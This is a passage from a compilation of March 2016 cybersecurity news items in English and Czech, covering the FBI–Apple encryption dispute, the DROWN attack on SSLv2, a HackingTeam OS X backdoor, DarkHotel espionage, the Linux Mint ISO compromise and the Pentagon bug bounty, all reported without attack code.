“Only money will force these extremely powerful companies like Apple and Google to comply. They are hiding behind a supposed privacy protection, but they’re quick to make commercial use of personal data that they’re collecting.”

Galut sustains that the punishment aims to discourage companies that were operating under “total bad faith”.

The French law enforcement seized eight mobile last year in investigations on suspects for terrorism, in all the cases the police was not able to access their content. The response of the France Government is a new law framework to oblige IT companies to comply with court orders.

The IT giants, including Google, Facebook, Twitter and WhatsApp, sided with Apple against the request of the US Government in the San Bernardino case.

Let’s wait for the final judgement on the case.


RSA Conference Badge Scanning App has a default password hardcoded
3.3.2016 Security

Researchers at Bluebox Security discovered that the badge scanning application used at the RSA Conference 2016 includes a hardcoded default password.
This year participants at the 2016 RSA Conference will have an ugly surprise, many vendors were provided with Samsung Galaxy S4 smartphones that run a special Android app, available on the Google Play, that allows them to keep track of visitors by scanning their badges.

The mobile scanning cannot be used for anything except scanning badges, unless the administrator unlocks it using a password. This working mode is also note as “kiosk mode.”

Security experts at Bluebox Security downloaded analyzed the scanning app and discovered that authors embedded the default password in the source code in plain text.

“When we used that passcode we were able to gain access to the kiosk app’s settings. This, in turn, let us gain access to the device’s system settings, which then enabled us to put the device into developer mode to gain full access to the device,” Bluebox Security researchers told Securityweek.com. “This is concerning because if we can do this, an attacker can too, letting them root the device, pull any data off of it, or install malware to steal even more data.”

“We speculate that the default code embedded in the app is there as a mechanism so that the device can still be managed even if the admin’s custom passcode is lost. However, it is a poor developer practice to embed passwords into an app’s shipped code, especially un-encrypted and un-obfuscated,” experts noted.

RSA Conference 2016

In this specific there aren’t serious risks for end-users, but it is quite common find mobile apps with hardcoded credentials. Hackers could exploit the embedded password to gain control of the device, at that point it a joke use it to spy on victims or to recruit is in a mobile botnet.

Something similar has already happened in 2014 when experts at IOActive uncovered a number of flaws affecting the RSA Conference Android app, such as information disclosure issues.

Security by design have to be a must for mobile app development, unfortunately due to the rapid diffusion of Rapid Application Mobile Development Tools is it quite easy to publish a mobile app, but in most cases the security requirements are totally ignored.

It is curious that this thing happened at a conference followed by most important experts in the security field.


Apple opravuje chyby v Apple TV. Útočníci přes ni mohli tahat data

2.3.2016 Zranitelnosti
Zhruba 60 chyb opravila společnost Apple ve své chytré krabičce pro „hloupé televize“ Apple TV. Chyby se nahromadily i proto, že firma přistoupila k updatu systému poprvé od loňského dubna. Nová verze systému třetí generace má označení 7.2.1. Firma vydala i dvě záplaty pro čtvrtou generaci Apple TV, která běží na systému tvOS.

Jak píše server Security Week, některé chyby jsou tak závažné, že je mohli útočníci zneužít k spuštění závadného kódu nebo ukradení informací. Stejné chyby, jaké mají aplikace v Apple TV, přitom již firma řešila u stejných aplikací v jiných operačních systémech.


Útok DROWN využívá staré chyby v SSLv2

2.3.2016 Počítačový útok
Informace o útoku nazvaném DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) zveřejnil mezinárodní výzkumný tým 1. března. Využívá 17 let staré chyby v dnes již překonaném, ale stále používaném protokolu SSLv2.

„Jde o vážnou zranitelnost, která se dotýká protokolu HTTPS a dalších služeb závisejících na SSL a TLS, tedy klíčových šifrovacích protokolů nezbytných pro zabezpečení na internetu,“ uvádí autoři studie (dostupná v PDF). „Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ dodává český Národní bezpečnostní tým.

Zranitelné jsou ty servery, které:

povolují zastaralý protokol SSLv2
využívají klíč, který je zároveň využit serverem povolujícím SSLv2
Princip útoku DROWN
Princip útoku DROWN: Útočník napadne server požadavky SSLv2 a získá tak údaje, které využije k dekódování dat oběti přenášených přes TLS.Ohrožené jsou servery, které využívají TLS i SSLv2 protokoly, nebo servery, které používají SSLv2 protokol a sdílí klíč s jiným TLS serverem. Celkem je tak zranitelných 33 % webových serverů.
Zobrazit galerii

Podle odhadu autorů je zasažena čtvrtina až třetina všech internetových serverů. „Tento problém je srovnatelný s chybou Heartbleed (více o Heartbleed zde). I v tomto případě může dojít k dešifrování komunikace,“ uvedla pro Technet.cz Zuzana Duračinská, bezpečnostní analytička sdružení CZ.NIC.

Po celém světě jsou zranitelné miliony serverů. V České republice jsou to tisíce. „Podle informací, které jsme včera obdrželi, se problém týká téměř třinácti tisíc IP adres,“ řekla Duračinská. „Všechny provozovatele těchto adres jsme již o tomto problému informovali.“

Řešení: okamžité i dlouhodobé
Každý provozovatel webových serverů si může ověřit, zda je jeho server napadnutelný útokem DROWN. Nejjednodušší ochranou je zakázat protokol SSLv2 na všech serverech. Některé webové servery (např. Microsoft IIS od verze 7.0) a knihovny (např. OpenSSL od verze 1.0.2g) jsou takto již nastavené, u jiných je potřeba toto nastavení upravit.

Uživatelé nemohou pro svou ochranu v tuto chvíli udělat nic, na straně klienta není proti útoku DROWN obrany. Maximálně se mohou vyhýbat serverům, které nejsou zabezpečené. To nám potvrdila i Duračinská: „Na straně uživatelů bohužel není možné se jakkoliv bránit. Potřebná opatření musí udělat dotčení provozovatelé služeb.“

Ohrožené jsou servery, které využívají TLS i SSLv2 protokoly, nebo servery, které používají SSLv2 protokol a sdílí klíč s jiným TLS serverem. Celkem je tak zranitelných 33 % webových serverů.
Dlouhodobé řešení vidí autoři studie v pečlivém zavírání bezpečnostních chyb, odstřihávání zastaralých protokolů a knihoven a omezení opakovaného využívání bezpečnostních klíčů. V současné době ale podle nich „finanční politika certifikačních autorit povzbuzuje firmy k tomu, aby si nakoupily nejmenší možný počet bezpečnostních certifikátů.“


Hacking Team, který dodává sledovací nástroje vládám je zpět. Experti objevili nový malware pro OS X
2.3.2016 Zdroj: Živě 
Viry
Hacking Team je italskou společností, která mimo jiné provozuje malware-as-service. V rámci služeb tedy nabízí třeba sledování pro soukromé subjekty, ale i státní orgány. Minulý rok jsme o něm psali v souvislosti s únikem dat, který odhalil, že si služby Hacking Teamu platí i česká policie. Od té doby se zdála být činnost společnosti utlumená. Nyní však experti objevili nový vzorek malwaru pro OS X, za nímž s největší pravděpodobností rovněž stojí nechvalně proslulí Italové.

Škodlivý kód byl nalezen prostřednictvím služby VirusTotal patřící Googlu, která se stará o online kontrolu souborů. Obsahuje celkem 56 antivirových služeb, které nahraný soubor překontrolují. V době psaní článku vyhodnotilo tento soubor jako malware 19 služeb a například McAfee nebo Security Essentials od Microsoftu jej považují za bezpečný.

blockblock.png
V infikovaném OS X se nachází složka ~/Library/Preferences/8pHbqThW/ a v ní soubor Bs-V7qIU.cYL (zdroj: Patrick Wardle)

O analýzu se postaral expert na reverzní inženýrství Pedro Vilaça. Ten našel v kódu jasné stopy vedoucí k předchozím vzorkům Hacking Teamu. Především potom ve způsobech, které jsou využité pro skrytí malwaru v systému. Samozřejmě existuje šance, že jiná skupina nebo hacker využil uniklých kódů Hacking Teamu a postavil na nich vlastní malware. Pravděpodobnost je však velmi nízká, neboť i IP adresy vedoucí z aktuálního vzorku souvisí s italskou společností.


Kanye West, Who wants to destroy ‘The Pirate Bay’, Caught using Torrent Site
2.3.2016 Safety
The 38-year-old rapper Kanye West is at the centre of controversy once again.
West is himself a Pirate Lover just like everyone else, and he proved it today by sharing a photo of his laptop screen on Twitter.
The rapper tweeted an ill-judged picture on Tuesday night to show what he was listening to on YouTube (Sufjan Stevens’ 'Death With Dignity' song), but his fans discovered something he would have hide if realized before sharing that snap.
Taking a closer look at the address bar was quite revealing, showing two very interesting tabs:
The notorious file-sharing website The Pirate Bay
MediaDownloader
Pirate Bay Offers Tech Support to Kanye West
kanye-west-torrent-pirate-bay
West’s recent album The Life of Pablo was involved in a piracy concern. He was so outraged when he saw his recent album was being pirated by 500,000 downloads in just two days that he considered taking legal action against The Pirate Bay.
However, in a recent tweet West accidentally revealed his own pirate habits.
It looks like the controversial rapper was torrenting a pirated copy of Xfer Records synthesizer software Serum on The Pirate Bay. The serum is a popular WaveTable editor that costs just $189 for a license.
However, despite having harsh feelings, the Pirate Bay team said it was happy to provide West with tech support.
DJ Deadmau5, co-founder of Xfer Records, called out West as a dick and later he showed some sympathy for West, calling for a Kickstarter campaign to raise fund to help West afford a copy of Serum.


US DoD invites a restricted number of hackers to Hack the Pentagon
2.3.2016 Hacking

Hack the Pentagon – DoD would invite outside hackers to test the cybersecurity of some public US Defense Department resources as part of a pilot initiative.
Which is the best way to discover security vulnerabilities affecting a computer system? Ask a group of hackers to test it. This is the concept behind a bounty program, an organization can hire hackers to test the system and ethically disclose the flaw, receiving a reward. Bug bounties are very popular initiatives among the communities of white hats, principal companies, including Facebook, Google and Microsoft. Facebook, for example, has already paid more than $3 million since 2011, when its bug bounty program was launched.

And what about if I tell you that the organization in question is the pentagon? Yes, it is true, ‘Hack the Pentagon’ is the initiative launched by the US Government, the first ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.

If the Pentagon will financial reward the hacker, it would be the first government-funded bug bounty initiative in the world.

“The Pentagon said on Wednesday it would invite vetted outside hackers to test the cybersecurity of some public U.S. Defense Department websites as part of a pilot project next month, in the first-ever such program offered by the federal government.”

“Hack the Pentagon” is modeled after similar competitions known as “bug bounties” that are conducted by big U.S. companies, including United Continental Holdings Inc to discover gaps in the security of their networks.” states the Reuters.

At time I was writing the bounty program has not been announced, until today, the Pentagon already uses its own internal security experts (so-called “red teams”) to test its networks, but openness to external hackers could give a major impetus in finding vulnerabilities in government systems, allowing to find new security holes.

The Hack the Pentagon initiative is welcome within the US government, in this way the expert at the Pentagon will be able to identify security issues before hackers can exploit them, with a significant improvement in term of cyber security.

“I am confident that this innovative initiative will strengthen our digital defenses and ultimately enhance our national security,” commented the Defense Secretary Ash Carter.
According to the Reuters, the participants will have to be US citizens and submit to background checks before being accepted to the Hack the Pentagon program, this is the principal difference with a common bug bounty initiative.

The program is being led by the DoD Defense Digital Service, which is a small team of engineers and experts, set up in November 2015, meant to “improve the Department’s technological agility and solve its most complex IT problems.”

In October 2015, Current and former members of the department’s cyber wing of the US Army, Captain Michael Weigand and Captain Rock Stevens, published a paper urging a joint project between the Army Cyber Institute and the US Marine Corps Forces Cyberspace Command. The project aimed to establish a central program for disclosing software vulnerabilities on military systems.

The military experts highlighted how essential aspects of the software lifecycle, like patch management and penetration testing are very difficult to carry on these environments. The systems used in the US Army are exposed by an absence of centralized patch management and penetration testing are not allowed due to the nature of the systems.

They call for a radical change, including the introduction of bug bounties, today internal experts who discovered vulnerabilities have no incentive to report the flaw are no obliged to disclose it, the post refers this bad habit as a “do nothing” culture.

AVRP UR ARMY HAck the Pentagon

In the paper published on the Cyber Defense Review website, the duo proposed the creation of an Army Vulnerability Response Program (AVRP), a bug bounty program run by the US military.

The Army Vulnerability Response Program (AVRP) platforms proposed by the military expert have to enable service people to report bugs free of risk of retribution, and say penetration tests should be promoted as vulnerability scans are inadequate.

“The AVRP will serve as the central reporting mechanism for vulnerabilities in Army networks and will receive reports on poor configurations or gaps in security that could allow attackers to degrade Army systems. These systems include Army digital training management systems, Army Battle Command Systems, logistics procurement systems, and combat platforms deployed in hostile environments. Researchers can report vulnerabilities through a phone hotline or an online submission portal. The AVRP will track all submissions, facilitate the flow of communication with affected entities, and play an integral role in resolving the vulnerability throughout US government networks,” the paper reads.

The creation of a bug bounty program is an urgency for the US Government, it comes after the numerous successfully attacks suffered by US entities, including OPM, the White House, and The State Department.


The return of HackingTeam with new implants for OS X
2.3.2016 Zdroj: Kaspersky Apple
Last week, Patrick Wardle published a nice analysis of a new Backdoor and Dropper used by HackingTeam, which is apparently alive and well. Since HackingTeam implants are built on-demand for each target, and it appears that the samples mentioned in the blog were found in-the-wild, we wanted to take a closer look: to see how it works and what its functionality reveals about the possible interest of the attackers behind this latest Backdoor.

Encryption key

The main Backdoor component receives its payload instructions from an encrypted Json configuration file. In order to decrypt the configuration file, we began by using known keys, but none of them were able to decrypt the file. Upon checking the binary file we were able to identify that the function used to encode the file is still AES 128, so we started to look for a new encryption key. We located the initialization of the encryption routine, where the key is passed as an argument.

 

By following this code we were able to find the new key used to encrypt the configuration file.

 

As you can see, the key is 32 bytes long, so just the first 16 bytes are used as the key. By using this key on our script we successfully decrypted the configuration file, which turns out to be a Json format file carrying instructions on how that particular Backdoor needs to operate on the target’s OS X machine:

What does the implant do?

It takes screenshots
It synchronizes with or reports stolen information to a Linode server located in the UK, but only when connected to Wi-Fi and using a specific Internet channel bandwidth defined by the Json configuration file:
 

It steals information on locally-installed applications, address book entries, calendar events and calls. OS X allows iPhone users to make such calls straight from the desktop when both are connected to the same Wi-Fi network and trusted.
It spies on the victim by enabling frontal camera video recording, audio recording using the embedded microphone, sniffing local chats and stealing data from the clipboard.
It also steals emails, SMS and MMS messages from the victim, which are also available on the OS X desktop when an iPhone is paired.
 

Among other functionalities it also spies on the geolocation of the victim.

It’s interesting to note that the Json file says that the start date of the operation is October 16 (Friday), 2015. This indicates that this is a fresh HackingTeam Backdoor implant.

For some reason the attacker was not interested in any emails sent to or from the target before that date but only from then on.

Kaspersky Lab detects the above-mentioned Backdoor implants as Backdoor.OSX.Morcut.u and its dropper as Trojan-Dropper.OSX.Morcut.d


FBI Admits — It was a 'Mistake' to Reset Terrorist's iCloud Password
2.3.2016 Apple
Yes, FBI Director James Comey admitted that the investigators made a "mistake" with the San Bernardino investigation during a congressional hearing held by the House Judiciary Committee.
Apple is facing a court order to help the FBI unlock an iPhone belonged to San Bernardino Shooter by developing a backdoored version of iOS that can disable the security feature on the locked iPhone.
Apple's Chief Executive Tim Cook has maintained his stand over Privacy and Security, saying the company will fight the court order because it is dangerous for the security and privacy of all of its users.
As the company earlier said, Apple had been helping the FBI with the investigation in San Bernardino case since early January by providing an iCloud backup of Farook's iPhone under a court order and ways to access Farook's iPhone…
...but the problem, according to Apple, was that the feds approached the company after attempting a 'blunder' themselves.
Also Read: FBI Director — "What If Apple Engineers are Kidnapped and Forced to Write Code?"
Just after the San Bernardino terrorist attacks, an unnamed local police official 'Reset the Apple ID Passcode' associated with the shooter's iPhone 5C in "less than 24 hours after the government took possession of the device" in an attempt to access the data.
When the feds approached Apple to help them brute force the passcode without losing data, the company suggested the FBI an alternative way, i.e.:
Connect Farook's iPhone to the Internet by taking it to a known Wi-Fi range. This way his iPhone would have automatically backed up device data with his iCloud Account.
FBI Director: It was a 'Mistake' to Reset iCloud Password
However, when one of the committee members asked Comey about whether the iPhone had its iCloud password changed, preventing the phone from backing up to accessible Apple servers.
Comey was forced to admit that the iCloud password was changed at the FBI's request, calling it a "mistake." Though the FBI previously stated that changing the iCloud password was not a screw-up.
"As I understand from the experts, there was a mistake made in that 24 hours after the attack where the [San Bernardino] county at the FBI's request took steps that made it hard—impossible—later to cause the phone to back up again to the iCloud," Comey said in testimony.
Must Read: Apple is working on New iPhone Even It Can't Hack.
FBI Asked NSA to Unlock iPhone, But NSA couldn't Do it
This was not the only difficult question Comey fielded in the hearing. Comey was also asked how many other federal agencies the Federal Bureau of Investigation (FBI) had asked for help.
Apple itself asked the FBI similar question last week: If the FBI wants to hack an iPhone, why doesn't it just ask the NSA?
Comey replied that people who watch too much television exaggerated the technical capabilities of federal agencies. He did directly respond to a question about whether the U.S. National Security Agency (NSA) helped.
His answer was pretty clear: No, the NSA could not do it.
Also Read: Apple Can Unlock iPhones, Here's How to Hack-Proof your Device.
Here's what Rep. Judy Chu, Democrat of California asked Comey during the hearing on "The Encryption Tightrope: Balancing Americans' Security and Privacy":
I'd like to ask about law enforcement finding technical solutions....Has the FBI pursued these other methods tried to get help from within the federal government, such as from agencies like the NSA?
Here's the response from Comey:
Yes is the answer. We've talked to anybody who will talk with us about it, and I welcome additional suggestions.
During the hearing, Comey wanted to highlight Apple's capability to create a backdoor to unlock the iPhone's encryption, a fact Apple has admitted.
Also Read: Apple hires developer of World's Most Secure Messaging App.
From the beginning, the members of the House Judiciary Committee indicated a strong disapproval of the FBI's actions in the San Bernardino case. Rep. Conyers, a ranking member of the committee, noted that he has long opposed mandating backdoors in a service.


DarkHotel hackers are back targeting Chinese Telecom
2.3.2016 Hacking

The DarkHotel APT group is back and it is targeting executives at telecommunications companies in China and North Korea.
According to threat intelligence start-up ThreatBook, the DarkHotel APT group is targeting executives at telecommunications companies in China and North Korea.

The Darkhotel espionage campaign was first uncovered by security experts at Kaspersky Lab in November 2014. The experts discovered that the hacking campaign was ongoing for at least four years while targeting selected corporate executives traveling abroad. According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared as highly skilled professionals that exfiltrate data of interest with a surgical precision and deleting any trace of their activity. The researchers noticed that the gangs never go after the same target twice. The list of targets includes CEOs, senior vice presidents, top R&D engineers, sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Experts at ThreatBook dubbed the new campaign DarkHotel Operation 8651, the hackers have already compromised at least one organization by using spear phishing emails.

The spear phishing messages came with malicious documents attached, typically a crafted SWF file embedded as a downloadable link in a Word document.

The DarkHotel hackers exploited the Adobe Flash vulnerability CVE-2015-8651, patched by Adobe on Dec. 28 with an out-of-band patch.

The attackers disguise the malicious code a component of the OpenSSL library. Experts noticed that the malware implements a number of anti-detection measures, including anti-sandbox and just-in-time decryption.

To better understand the DarkHotel group, let me provide you further details emerged by an update provided by Kaspersky Lab in August 2015. Kaspersky confirmed that the organizations targeted by the DarkHotel APT in 2015 were located in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany.

Darkhotel relied on phishing emails containing links to Flash Player exploits disclosed following the data breach suffered by the Hacking Team surveillance firm.

“…at the beginning of July, it began to distribute what is reported to be a leaked Hacking Team Flash 0day. It looks like the Darkhotel APT may have been using the leaked HackingTeam Flash 0day to target specific systems. We can pivot from “tisone360.com” to identify some of this activity. ” Kaspersky wrote in a blog post.

The DarkHotel APT used obfuscated HTML Application (HTA) files to serve backdoor and downloader code on infected systems since 2010, in August security experts discovered new variants of the malicious HTA files.

“It’s somewhat strange to see such heavy reliance on older Windows-specific technology like HTML applications, introduced by Microsoft in 1999,” experts noted.

DarkHotel APT backdoor

The hackers also improved the obfuscation techniques using more efficient evasion methods, in one case the attackers used a signed downloaders developed to detect known antivirus solutions.

The spear-phishing emails used by the Darkhotel group in the past contain .rar archives that appeared to include a harmless .jpg file. In reality, the file is a .scr executable that appears like a JPEG using a technique known as right-to-left override (RTLO). When the file is opened, an image is displayed in the Paint application, while the malicious code is executed in the background.

Another novelty for the espionage campaign run by the Darkhotel APT group is the use of stolen digital certificates that are used to sign malware.

According to the experts at Kaspersky, the APT group appears to be Korean speaker.


Šifrování nechápou ani brazilské úřady. Ve vězení skončil viceprezident Facebooku/WhatsApp
2.3.2016
Zabezpečení

Zatímco se ve Spojených státech řeší kauza FBI vs. Apple, v níž odmítá technologický gigant zpřístupnit zašifrovaný obsah telefonu, v Brazílii posunuly úřady podobný spor ještě dál. Doplatil na to viceprezident Facebooku pro Latinskou Ameriku, který má na starosti komunikátor WhatsApp. V úterý jej podle Fortune zatkla policie a skončil ve vazbě.

Důvodem je podobný postoj jako v případě Applu. Provozovatelé aplikace WhatsApp, jež komunikaci šifruje, odmítli zpřístupnit policii komunikaci několika podezřelých. Vydat ji samozřejmě nemohli – na serverech služby je zašifrována. To však brazilským úřadům nezabránilo v tom, aby tento postup označili za maření vyšetřování.

Prvním zásahem bylo odstavení služby na 48 hodin loni v prosinci. Nyní to odnesl vysoký manažer, který byl zadržen při cestě do kanceláře. V prohlášení brazilské policie je uvedeno jako důvod opakované nedodržování nařízení soudu. Ten vyšetřoval několik případů obchodu s drogami.


Hackeři ISIS se netrefili, místo Googlu sestřelili web nabízející SEO
2.3.2016
Hacking
Hackerská skupina Cyber Caliphate Army (CCA) navázaná na teroristickou organizaci ISIS se nechala slyšet, že se hodlá zaútočit na samotný Google. Prostřednictvím sítě Telegram ohlásila útok na pondělí, jenže nejnavštěvovanější web zůstal pochopitelně nedotčený. Místo něj to však odnesl web Add Google Online, který se specializuje na optimalizaci stránek pro vyhledávače (SEO). Informoval o tom Newsweek.

isis-hackers-google-hacked-cca-caliphate-cyber-army.jpg
Útok na Google odnesl web indické společnosti Add Google Online

Na napadeném webu se objevilo logo skupiny obsahující vlajku ISIS s všeříkajícím nápisem HackedBy:CCA. Ačkoliv nemá společnost registrovaná v Indii s Googlem nic společného, přesto si ji útočníci vybrali. Podobně v minulosti útočili na web společnosti zabývající se solární energií, stránky japonské tanečnice nebo firmy prodávající laminátové podlahy. Podle odborníků tím organizace napojená na ISIS chce především demonstrovat rostoucí sílu, která by mohla být v budoucnu použita k útoku na důležitější cíle.

Z napadeného webu Add Google Online se mezi tím stalo pískoviště pro další hackerské skupiny. Aktuálně ji má pod kontrolou n3far1ous a po otevření webu najdete dialogové okno s nápise Eat this ISIS.


Hacknutý web Linux Mint šířil napadenou verzi systému

2.3.2016 Hacking

Stovky lidí si stáhly Linux Mint doplněný o škodlivý kód, zadní vrátka. Útočník je chtěl využít pro vybudování botnetu.
Linux Mint měl před týdnem hacknutý web a lidé, kteří si odtamtud stáhli tuto (třetí nejpopulárnější) distribuci Linuxu, si ve skutečnosti stáhli upravený Mint obsahující backdoor. Pokud vám to připadá nemožné, tak bohužel. Stačí se podívat na Beware of hacked ISOs if you downloaded Linux Mint on February 20th!

Podstatné je, že k napadení došlo, ale velmi rychle se na něj přišlo. Hacker ovlivnil pouze Linux Mint 17.3 Cinnamon ISO a pouze 20. února 2016 (berte v úvahu US časovou zónu).

Napadenou verzi bylo možné stáhnout pouze jako ISO „odkazem z webu“, pokud jste tedy ke stahování používali torrent nebo stahovali přímo z Linuxmint.com (ne přes odkaz na něm), napadenou verzi nemáte. Ověřit si, co jste si případně stáhli, je možné pomocí MD5 kontrolního součtu (najdete je ve výše uvedeném oznámení). Případně podle přítomnosti /var/lib/man.cy v systému.

Podle hackera, který používá jméno „Peace“, si upravený Mint stáhlo několik set lidí, což je poměrně dost, celodenní počet stažení v ten den měl být něco přes tisícovku. Mimo téhle patálie hacker uvádí, že se mu podařilo dvakrát získat i kompletní kopii fóra z webu, jednu z 28. ledna, druhou z 18. února. V té jsou osobní informace uživatelů – e-maily, data narození, profilové obrázky a kódovaná hesla. Ta jsou kódována pomocí PHPass a tím pádem je možné získat jejich čitelnou podobu.

Pokud jste tedy používali fórum na Linux Mint webu, považujte raději vaše tamní heslo za veřejně dostupné. Nejenom proto, že kompletní dump se objevil na dark webu a obsahuje přes 70 tisíc údajů o účtech. Dobrá zpráva je, že haveibeenpwned.com vám umožní zjistit, zda došlo k úniku právě vašeho hesla.

Podle Hacker explains how he put „backdoor“ in hundreds of Linux Mint downloads je „Peace“ sólovým hráčem, který nemá žádné spojení s hackerskými skupinami. Na web Linux Mint se mu podařilo dostat přes zranitelnost, kterou objevil v lednu. 20. února pak nahradil ISO vlastní modifikovanou podobu (velmi pravděpodobně nikoliv ISO přímo na serveru, ale jen odkaz na něj ze stránky s odkazy na stažení, plyne z ostatních informací). Aby se pojistil, tak pozměnil i informace o kontrolních součtech (MD5). Motivací mělo být to, že si chtěl z napadených počítačů vytvořit botnet, k čemuž měl použít známý a snadno použitelný malware jménem Tsunami.

Pokud se vám podařilo v uvedený čas (sobota 20. února, s ohledem na časový posun může jít u nás až o neděli 21. února) stáhnout napadenou verzi Mintu, tak ISO zahoďte, stejně jako případné vypálené DVD. Máte-li už systém nainstalovaný, tak virtuál zlikvidujte, stejně jako případnou USB klíčenku. Instalace na počítači je také ztracená, může tam být cokoliv dalšího, takže vás čeká čistá instalace.


Facebook's Vice President Arrested in Brazil for Refusing to Share WhatsApp Data
2.3.2016 Social Site
Apple is not the only technology giant battling against authorities over a court order; Facebook is also facing the same.
Brazil’s federal police arrested Facebook Latin America Vice President for failing to comply with court orders to help investigators in a drug trafficking case that involves WhatsApp, a popular messaging app owned by Facebook that has over 100 Million users in Brazil.
Facebook VP Diego Jorge Dzodan was arrested on his way to work in São Paulo, Brazil today because the company refused to provide details of a WhatsApp user involved in organized crime and drug trafficking.
Dzodan is still in police custody and is responding to police questioning in Sao Paulo, Local media reported.
According to a statement released by a spokesperson from WhatsApp:
"We are disappointed that law enforcement took this extreme step. WhatsApp cannot provide information we do not have. We cooperated to the full extent of our ability in this case, and while we respect the important job of law enforcement, we strongly disagree with its decision."
In December 2015, the Brazilian court blocked WhatsApp messaging service temporarily for 24 hours in Brazil, after the company refused to hand over the content of communications between alleged drug dealers involved in the drug trafficking case.
...and the refusal now resulted in the arrest of Facebook VP.
At the time of WhatsApp blackout in Brazil, Facebook’s Chief Executive Officer Mark Zuckerberg said that he was stunned by the "extreme decision by a single judge to punish every person in Brazil who uses WhatsApp."
Today’s arrest of Facebook VP comes as a New York judge ruled that the United States government have no right to force Apple to unlock an iPhone involved in a drug case.
Apple is also fighting a legal battle against a court order that demands the company to help the FBI unlock an iPhone 5C belonging to the one of the shooters involved in the San Bernardino massacre.


FBI Director — "What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?"
2.3.2016 Hacking
What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?
Exactly this was what FBI Director James Comey asked in the congressional hearing on Tuesday.
The House Judiciary Committee hearing on "The Encryption Tightrope: Balancing Americans' Security and Privacy" over the ongoing battle between Apple and the FBI ended up being full of drama.
The key to the dispute is whether the Federal Bureau of Investigation (FBI) can force Apple to develop a special version of its mobile operating system that would help the agency unlock an iPhone belonged to San Bernardino shooter Syed Farook.
FBI Director James Comey was there with a prepared testimony about why the FBI wants Apple to create a backdoor into the killer's iPhone.
Comey: Encryption is a Long-Term Threat to Law Enforcement
Yesterday, a New York magistrate judge refused a similar order in a drug case in which the authorities asked Apple to help with the data stored in an unlocked iPhone.
The judge suggested that the government’s interpretation of the All Writs Act – the same 1789 law the FBI is invoking in the San Bernardino case to compel Apple to write a backdoor – would weaken the separation of powers as well as trample on the United States Constitution itself.
Comey, who portrayed Encryption as a long-term threat to the law enforcement because it lets criminals "go dark," said:
"Slippery slope arguments are always attractive, but I suppose you could say, 'Well, Apple's engineers have this in their head, what if they're kidnapped and forced to write software?' That's where the judge has to sort this out, between good lawyers on both sides making all reasonable arguments."
By making this comment, Comey wants to highlight that Apple is capable of creating a backdoor to unlock the iPhone's encryption, a fact Apple has admitted.
It seems that certain Apple engineers are guided on what to do if they're kidnapped, and according to a source with knowledge of Apple's security practices, the engineers are told to "go along with the demands and do whatever is necessary to survive."
Simply "Do whatever they ask. No heroes."

Apple: Can not Weaken Security of All of Our Products
Apple General Counsel Bruce Sewell, who was also prepared with his testimony, argued how a court order could compel the company to circumvent its own encryption technology in an effort to get at the contents of an iPhone.
The FBI wants Apple to write a backdoored version of iOS that would help the feds circumvent iPhone's security measures. Apple countered that doing so would not only undermine the security of all its products, but also set a troubling example for the tech industry.
Swell said, "Building that software tool would not affect just one iPhone. It would weaken the security for all of them."
Apple Working on Unhackable iPhones
This kidnapping issue could also be resolved soon, as Apple is working on an unbreakable iPhone that even the company can not hack.
In addition, the company has also hired Frederic Jacobs, one of the key developers of World's most secure, encrypted messaging app Signal in order to enhance its iPhone security that even it can not break.
If this is not enough, Apple is also working on encrypting iCloud backups that only the account owner would have access, eliminating either way for the FBI or hackers that could expose its users data.


33 percent of all HTTPS websites open to DROWN attack

2.3.2016 Computer Attack

Security experts presented the DROWN attack that exploits a new critical security vulnerability affecting the OpenSSL.
Security experts have discovered a new critical security vulnerability affecting the OpenSSL, it has been estimated that more than 11 Million websites and e-mail services are open to cyber attacks.

The new attack, dubbed DROWN (stands for Decrypting RSA with Obsolete and Weakened eNcryption), allow attackers to access users’ sensitive data over secure HTTPS communications.

“If you’re running a web server configured to use SSLv2, and particularly one that’s running OpenSSL (even with all SSLv2 ciphers disabled!), you may be vulnerable to a fast attack that decrypts many recorded TLS connections made to that box. Most worryingly, the attack does not require the client to ever make an SSLv2 connection itself, and it isn’t a downgrade attack. Instead, it relies on the fact that SSLv2 — and particularly the legacy “export” ciphersuites it incorporates — are pure poison, and simply having these active on a server is enough to invalidate the security of all connections made to that device.” states the high-level description of the attack.

The attack could be successfully carried out in a few hours and in some cases the attackers is able to decrypt traffic in a few seconds.

“We’ve been able to execute the attack against OpenSSL versions that are vulnerable to CVE-2016-0703 in under a minute using a single PC. Even for servers that do not have these particular bugs, the general variant of the attack, which works against any SSLv2 server, can be conducted in under 8 hours at a total cost of $440.” explained the researchers.

DROWN is a cross-protocol attack that exploits vulnerabilities in the SSLv2 implementation against transport layer security (TLS), the attacks doesn’t work against the SSLv2 connections.

DROWN exploits a bug in SSLv2 protocol implementation to attack the security of connections made under a different protocol, in this case, TLS.

By using the Bleichenbacher attack, threat actors can decrypt the private RSA keys and unlock “secure” servers that use the same private key.

The attacker just needs to send specially crafted malicious packets to a server to decrypt HTTPS connections.

DROWN attack
“You’re just as much at risk if your site’s certificate or key is used anywhere else on a server that does support SSLv2,” security researchers noted. “Common examples include SMTP, IMAP, and POP mail servers, and secondary HTTPS servers used for specific web applications.”

A group of researchers from universities in Germany, the US and Israel alongside with two OpenSSL developers, have implemented the attack and demonstrated they can decrypt a TLS 1.2 handshake using 2048- bit RSA in under eight-hours using Amazon EC2, at a cost of $440.

The impact of the DROWN is serious, it has been estimated that more than 33 percent of all HTTPS servers is vulnerable to the attack, roughly 11.5 Million servers worldwide, including Alibaba, BuzzFeed, Flickr, Samsung, Sina, StumbleUpon, Weibo, Yahoo, and 4Shared.

The DROWN attack also works against Microsoft’s Internet Information Services versions 7 and earlier, as well as prior to 3.13 versions of the Network Security Services (NSS) Cryptographic library.

Users that want to test if a website is vulnerable to the DROWN attack can use the test.drownattack.com.
A patch for the vulnerability is already available in the last OpenSSL update.

Security experts have no doubts, now that the DROWN attack has been disclosed threat actors may actively exploit the flaw to attack servers.

Users need to update their OpenSSL to the newer versions 1.0.2g or 1.0.1s. In order to avoid the attack, it is possible to disable the SSLv2, as well as make sure that the private key isn’t shared across any other servers.

